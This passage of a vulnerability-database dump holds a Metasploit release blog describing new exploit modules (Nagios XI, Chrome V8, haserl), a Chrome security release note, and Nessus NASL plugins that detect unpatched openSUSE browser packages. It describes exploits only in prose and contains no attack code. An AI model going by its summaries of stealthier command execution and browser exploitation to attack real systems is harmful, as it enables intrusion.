[CVE-2020-35578](<https://attackerkb.com/topics/ftmpf6wgqi/cve-2020-35578?referrer=blog>), an RCE in Nagios XI versions prior to 5.8.0 that exploits a command injection when uploading plugins to allow authenticated administrative users to gain remote code execution as the `apache` user on affected systems.\n * [Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase](<https://github.com/rapid7/metasploit-framework/pull/15007>) by Rajvardhan Agarwal (r4j0x00), which exploits CVE-2020-16040 - Adds an exploit module for [CVE-2020-16040](<https://attackerkb.com/topics/XiXhz3J5Fi/cve-2020-16040?referrer=blog>), an integer overflow in the SimplifiedLowering phase of TurboFan in Google Chrome <= 87.0.4280.66 that allows attackers to overflow the heap and gain RCE. The module starts a webpage hosting malicious JavaScript that when visited by a vulnerable version of Chrome allows Remote Code Execution on a remote machine. This exploit requires the `--no-sandbox` Chrome flag, as no sandbox escape is present.\n * [Haserl Arbitrary File Reader](<https://github.com/rapid7/metasploit-framework/pull/14833>) by Ike Broflovski and Julien (jvoisin) Voisin, which exploits CVE-2021-29133 - This adds a post module exploit that leverages an arbitrary read in haserl prior to 0.9.36. This vulnerability is identified as [CVE-2021-29133](<https://attackerkb.com/topics/wrdNpI10DS/cve-2021-29133?referrer=blog>) and allows an attacker to read any file on the target filesystem without any specific privileges.\n\n## Enhancements and features\n\n * [#14622](<https://github.com/rapid7/metasploit-framework/pull/14622>) from [blacklist-arcc](<https://github.com/blacklist-arcc>) \\- This adds the `sp_oacreate` technique to the mssql_exec module which is a more stealthy alternative to the traditional xp_cmdshell stored procedure.\n * [#14701](<https://github.com/rapid7/metasploit-framework/pull/14701>) from [kalba-security](<https://github.com/kalba-security>) \\- The `nagios_xi_authenticated_rce.rb` module has been renamed to `nagios_xi_plugins_check_ping_authenticated_rce` and has been updated to take advantage of the Nagios XI mixin. Additionally the documentation has been updated to reflect these changes and to better explain how the module works.\n * [#14994](<https://github.com/rapid7/metasploit-framework/pull/14994>) from [archcloudlabs](<https://github.com/archcloudlabs>) \\- The `screen_spy.rb` module has been updated to allow users to specify the PID of a process they would like to migrate into before taking screenshots, rather than forcing users to migrate into an `explorer.exe` process. If no PID is specified, then `screen_spy.rb` will default to taking screenshots from the current process.\n * [#14997](<https://github.com/rapid7/metasploit-framework/pull/14997>) from [geyslan](<https://github.com/geyslan>) \\- The `payloads/singles/linux/x64/shell_bind_tcp_random_port.rb` shellcode has been updated to be more efficient, resulting in its size being reduced by one byte. Additionally comments have been updated to properly mention that the payload uses the string `//bin/sh`, not `/bin/sh`.\n * [#15017](<https://github.com/rapid7/metasploit-framework/pull/15017>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The `modules/auxiliary/admin/http/tomcat_ghostcat.rb` module has been updated to use a default `RPORT` value of 8080 and to add in the `AJP_PORT` option to specify where the Apache JServ Protocol Port is, which now defaults to a value of 8009.\n * [#15028](<https://github.com/rapid7/metasploit-framework/pull/15028>) from [geyslan](<https://github.com/geyslan>) \\- The `payloads/singles/linux/x64/exec.rb` payload has been updated to be more efficient, thereby reducing the total shellcode size. Additionally, support has been added for generating NULL byte free shellcode, and the code has been refactored to use Metasm to make it easier to understand.\n * [#15037](<https://github.com/rapid7/metasploit-framework/pull/15037>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Updates the `auxiliary/scanner/redis/redis_login` to first check if authentication is required before then attempting to bruteforce credentials.\n * [#15049](<https://github.com/rapid7/metasploit-framework/pull/15049>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- Several Meterpreter libraries have been updated to raise more specific and descriptive exception messages. These changes should help users and developers more quickly and easily identify the root cause of these exception messages when they are thrown. Additionally updates have been applied to allow Metasploit to proactively identify when a command will fail in a Meterpreter session due to it not being supported by the remote end.\n\n## Bugs fixed\n\n * [#14770](<https://github.com/rapid7/metasploit-framework/pull/14770>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Fixes the modules `freefloatftp_wbem`, `open_ftpd_wbem`, `ftp/quickshare_traversal_write`, and `http/solarwinds_storage_manager_sql` to correctly handle error scenarios and perform cleanup gracefully.\n * [#14985](<https://github.com/rapid7/metasploit-framework/pull/14985>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes the Json API to correctly interact with the configured framework database, as well as adding support for running the `msfdb webservice` component in the foreground with the `--no-daemon` flag.\n * [#14996](<https://github.com/rapid7/metasploit-framework/pull/14996>) from [h00die](<https://github.com/h00die>) \\- This fixes a logic bug in the cracker libraries where `hashcat` wasn't able to be run due to invalid version expectations.\n * [#15034](<https://github.com/rapid7/metasploit-framework/pull/15034>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes broken association handling for remote `msfdb` services command, where this issue previously caused a crash when running the `services` command after connecting to another remote database.\n * [#15038](<https://github.com/rapid7/metasploit-framework/pull/15038>) from [wvu-r7](<https://github.com/wvu-r7>) \\- This fixes a `NameError` in the `pulse_secure_gzip_rce` module which was preventing it from functioning correctly.\n * [#15043](<https://github.com/rapid7/metasploit-framework/pull/15043>) from [justinsteven](<https://github.com/justinsteven>) \\- This change fixes a bug on the `python/meterpreter/reverse_http` payload handler where, if the LURI option did not begin with a slash, the payload would fail to stage.\n * [#15047](<https://github.com/rapid7/metasploit-framework/pull/15047>) from [ryananicholson](<https://github.com/ryananicholson>) \\- This fixes a bug in DNS reverse lookups due to an invalid answer attribute.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.0.39...6.0.40](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-04-07T13%3A51%3A53-05%3A00..2021-04-15T12%3A30%3A00-04%3A00%22>)\n * [Full diff 6.0.39...6.0.40](<https://github.com/rapid7/metasploit-framework/compare/6.0.39...6.0.40>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-04-16T18:09:59", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-16040", "CVE-2020-35578", "CVE-2021-29133"], "modified": "2021-04-16T18:09:59", "id": "RAPID7BLOG:BCF35FC32C607E99444655FC5896B1EB", "href": "https://blog.rapid7.com/2021/04/16/metasploit-wrap-up-107/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "chrome": [{"lastseen": "2021-12-30T22:31:30", "description": "The Stable channel has been updated to 87.0.4280.88 for Windows, Mac and Linux which will roll out over the coming days/weeks.\n\n\nA full list of changes in this build is available in the [log](<https://chromium.googlesource.com/chromium/src/+log/87.0.4280.67..87.0.4280.88?pretty=fuller&n=10000>). Interested in switching release channels? Find out how [here](<https://www.chromium.org/getting-involved/dev-channel>). If you find a new issue, please let us know by [filing a bug](<https://crbug.com/>). The [community help forum](<https://productforums.google.com/forum/#!forum/chrome>) is also a great place to reach out for help or learn about common issues.\n\n\n\n\nSecurity Fixes and Rewards\n\nNote: Access to bug details and links may be kept restricted until a majority of users are updated with a fix. We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\n\n\n\n\nThis update includes [8](<https://bugs.chromium.org/p/chromium/issues/list?can=1&q=type%3Abug-security+os%3DAndroid%2Cios%2Clinux%2Cmac%2Cwindows%2Call%2Cchrome+label%3ARelease-1-M87>) security fixes. Below, we highlight fixes that were contributed by external researchers. Please see the [Chrome Security Page](<https://sites.google.com/a/chromium.org/dev/Home/chromium-security>) for more information.\n\n\n\n\n[$5000][[1142331](<https://crbug.com/1142331>)] High CVE-2020-16037: Use after free in clipboard. Reported by Ryoya Tsukasaki on 2020-10-26\n\n[$TBD][[1138683](<https://crbug.com/1138683>)] High CVE-2020-16038: Use after free in media. Reported by Khalil Zhani on 2020-10-14\n\n[$TBD][[1149177](<https://crbug.com/1149177>)] High CVE-2020-16039: Use after free in extensions. Reported by Anonymous on 2020-11-15\n\n[$TBD][[1150649](<https://crbug.com/1150649>)] High CVE-2020-16040: Insufficient data validation in V8. Reported by Lucas Pinheiro, Microsoft Browser Vulnerability Research on 2020-11-19\n\n[$TBD][[1151865](<https://crbug.com/1151865>)] Medium CVE-2020-16041: Out of bounds read in networking. Reported by Sergei Glazunov and Mark Brand of Google Project Zero on 2020-11-23\n\n[$TBD][[1151890](<https://crbug.com/1151890>)] Medium CVE-2020-16042: Uninitialized Use in V8. Reported by Andr\u00e9 Bargull on 2020-11-23\n\n\n\n\nWe would also like to thank all security researchers that worked with us during the development cycle to prevent security bugs from ever reaching the stable channel. \n\nAs usual, our ongoing internal security work was responsible for a wide range of fixes:\n\n * [[1154775](<https://crbug.com/1154775>)] Various fixes from internal audits, fuzzing and other initiatives\n\n\n\n\nMany of our security bugs are detected using [AddressSanitizer](<https://code.google.com/p/address-sanitizer/wiki/AddressSanitizer>), [MemorySanitizer](<https://code.google.com/p/memory-sanitizer/wiki/MemorySanitizer>), [UndefinedBehaviorSanitizer](<https://www.chromium.org/developers/testing/undefinedbehaviorsanitizer>), [Control Flow Integrity](<https://sites.google.com/a/chromium.org/dev/developers/testing/control-flow-integrity>), [libFuzzer](<https://sites.google.com/a/chromium.org/dev/developers/testing/libfuzzer>), or [AFL](<https://github.com/google/afl>).\n\n\n\n\n\n\n\n\nLakshmana Pamarthy [Google Chrome](<https://www.google.com/chrome/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "chrome", "title": "Stable Channel Update for Desktop", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2020-12-02T00:00:00", "id": "GCSA-2952833725589367718", "href": "https://chromereleases.googleblog.com/2020/12/stable-channel-update-for-desktop.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-01-11T14:40:05", "description": "This update for opera fixes the following issues :\n\n - Update to version 73.0.3856.284\n\n - CHR-8225 Update chromium on desktop-stable-87-3856 to 87.0.4280.88\n\n - DNA-88454 Background of snap area above visible scrolled viewport is not captured\n\n - DNA-89749 Implement client_capabilities support for Flow / Sync\n\n - DNA-89810 Opera no longer autoselects full url/address bar when clicked\n\n - DNA-89923 [Snap] Emojis look grayed out\n\n - DNA-90060 Make gesture events work with search-in-tabs feature\n\n - DNA-90168 Display SD suggestions titles\n\n - DNA-90176 Player doesn’t show music service to choose on Welcome page\n\n - DNA-90343 [Mac] Cmd+C doesn’t copy snapshot\n\n - DNA-90538 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&, extensions::ActionInfo::Type, extensions::CommandService:: QueryType, extensions::Command*, bool*)\n\n - The update to chromium 87.0.4280.88 fixes following issues: CVE-2020-16037, CVE-2020-16038, CVE-2020-16039, CVE-2020-16040, CVE-2020-16041, CVE-2020-16042\n\n - Update to version 73.0.3856.257\n\n - DNA-89918 #enable-force-dark flag doesn’t work anymore\n\n - DNA-90061 Clicking on video’s progress bar breaks autopausing\n\n - DNA-90079 [BigSur] Blank pages\n\n - DNA-90154 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&, extensions::ActionInfo::Type, extensions::CommandService:: QueryType, extensions::Command*, bool*)\n\n - Complete Opera 73.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-73/", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-2020-2360)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-2360.NASL", "href": "https://www.tenable.com/plugins/nessus/145375", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2360.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145375);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/21\");\n\n script_cve_id(\"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-2020-2360)\");\n script_summary(english:\"Check for the openSUSE-2020-2360 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for opera fixes the following issues :\n\n - Update to version 73.0.3856.284\n\n - CHR-8225 Update chromium on desktop-stable-87-3856 to\n 87.0.4280.88\n\n - DNA-88454 Background of snap area above visible scrolled\n viewport is not captured\n\n - DNA-89749 Implement client_capabilities support for Flow\n / Sync\n\n - DNA-89810 Opera no longer autoselects full url/address\n bar when clicked\n\n - DNA-89923 [Snap] Emojis look grayed out\n\n - DNA-90060 Make gesture events work with search-in-tabs\n feature\n\n - DNA-90168 Display SD suggestions titles\n\n - DNA-90176 Player doesn’t show music service to\n choose on Welcome page\n\n - DNA-90343 [Mac] Cmd+C doesn’t copy snapshot\n\n - DNA-90538 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type,\n extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n\n - The update to chromium 87.0.4280.88 fixes following\n issues: CVE-2020-16037, CVE-2020-16038, CVE-2020-16039,\n CVE-2020-16040, CVE-2020-16041, CVE-2020-16042\n\n - Update to version 73.0.3856.257\n\n - DNA-89918 #enable-force-dark flag doesn’t work\n anymore\n\n - DNA-90061 Clicking on video’s progress bar breaks\n autopausing\n\n - DNA-90079 [BigSur] Blank pages\n\n - DNA-90154 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type,\n extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n\n - Complete Opera 73.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-73/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.opera.com/desktop/changelog-for-73/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"opera-73.0.3856.284-lp152.2.27.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:37:25", "description": "This update for opera fixes the following issues :\n\n - Update to version 73.0.3856.284\n\n - CHR-8225 Update chromium on desktop-stable-87-3856 to 87.0.4280.88\n\n - DNA-88454 Background of snap area above visible scrolled viewport is not captured\n\n - DNA-89749 Implement client_capabilities support for Flow / Sync\n\n - DNA-89810 Opera no longer autoselects full url/address bar when clicked\n\n - DNA-89923 [Snap] Emojis look grayed out\n\n - DNA-90060 Make gesture events work with search-in-tabs feature\n\n - DNA-90168 Display SD suggestions titles\n\n - DNA-90176 Player doesn’t show music service to choose on Welcome page\n\n - DNA-90343 [Mac] Cmd+C doesn’t copy snapshot\n\n - DNA-90538 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&, extensions::ActionInfo::Type, extensions::CommandService:: QueryType, extensions::Command*, bool*)\n\n - The update to chromium 87.0.4280.88 fixes following issues: CVE-2020-16037, CVE-2020-16038, CVE-2020-16039, CVE-2020-16040, CVE-2020-16041, CVE-2020-16042\n\n - Update to version 73.0.3856.257\n\n - DNA-89918 #enable-force-dark flag doesn’t work anymore\n\n - DNA-90061 Clicking on video’s progress bar breaks autopausing\n\n - DNA-90079 [BigSur] Blank pages\n\n - DNA-90154 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&, extensions::ActionInfo::Type, extensions::CommandService:: QueryType, extensions::Command*, bool*)\n\n - Complete Opera 73.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-73/", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-01-25T00:00:00", "type": "nessus", "title": "openSUSE Security Update : opera (openSUSE-2020-2359)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16037", "CVE-2020-16038", "CVE-2020-16039", "CVE-2020-16040", "CVE-2020-16041", "CVE-2020-16042"], "modified": "2021-04-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2020-2359.NASL", "href": "https://www.tenable.com/plugins/nessus/145317", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2359.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(145317);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/04/21\");\n\n script_cve_id(\"CVE-2020-16037\", \"CVE-2020-16038\", \"CVE-2020-16039\", \"CVE-2020-16040\", \"CVE-2020-16041\", \"CVE-2020-16042\");\n\n script_name(english:\"openSUSE Security Update : opera (openSUSE-2020-2359)\");\n script_summary(english:\"Check for the openSUSE-2020-2359 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for opera fixes the following issues :\n\n - Update to version 73.0.3856.284\n\n - CHR-8225 Update chromium on desktop-stable-87-3856 to\n 87.0.4280.88\n\n - DNA-88454 Background of snap area above visible scrolled\n viewport is not captured\n\n - DNA-89749 Implement client_capabilities support for Flow\n / Sync\n\n - DNA-89810 Opera no longer autoselects full url/address\n bar when clicked\n\n - DNA-89923 [Snap] Emojis look grayed out\n\n - DNA-90060 Make gesture events work with search-in-tabs\n feature\n\n - DNA-90168 Display SD suggestions titles\n\n - DNA-90176 Player doesn’t show music service to\n choose on Welcome page\n\n - DNA-90343 [Mac] Cmd+C doesn’t copy snapshot\n\n - DNA-90538 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type,\n extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n\n - The update to chromium 87.0.4280.88 fixes following\n issues: CVE-2020-16037, CVE-2020-16038, CVE-2020-16039,\n CVE-2020-16040, CVE-2020-16041, CVE-2020-16042\n\n - Update to version 73.0.3856.257\n\n - DNA-89918 #enable-force-dark flag doesn’t work\n anymore\n\n - DNA-90061 Clicking on video’s progress bar breaks\n autopausing\n\n - DNA-90079 [BigSur] Blank pages\n\n - DNA-90154 Crash at extensions::CommandService::\n GetExtensionActionCommand(std::__1::basic_string const&,\n extensions::ActionInfo::Type,\n extensions::CommandService:: QueryType,\n extensions::Command*, bool*)\n\n - Complete Opera 73.0 changelog at:\n https://blogs.opera.com/desktop/changelog-for-73/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://blogs.opera.com/desktop/changelog-for-73/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome versions before 87.0.4280.88 integer overflow during SimplfiedLowering phase');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"opera-73.0.3856.284-lp151.2.39.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"opera\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-10T14:55:16", "description": "This update for chromium fixes the following issues :\n\nUpdate to 87.0.4280.88 boo#1179576\n\n - CVE-2020-16037: Use after free in clipboard\n\n - CVE-2020-16038: Use after free in media\n\n - CVE-2020-16039: Use after free in extensions\n\n - CVE-2020-16040: Insufficient data validation in V8\n\n - CVE-2020-16041: Out of bounds read in networking\n\n - CVE-2020-16042: Uninitialized Use in V8", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-12-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : chromium (openSUSE-2020-2216)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": 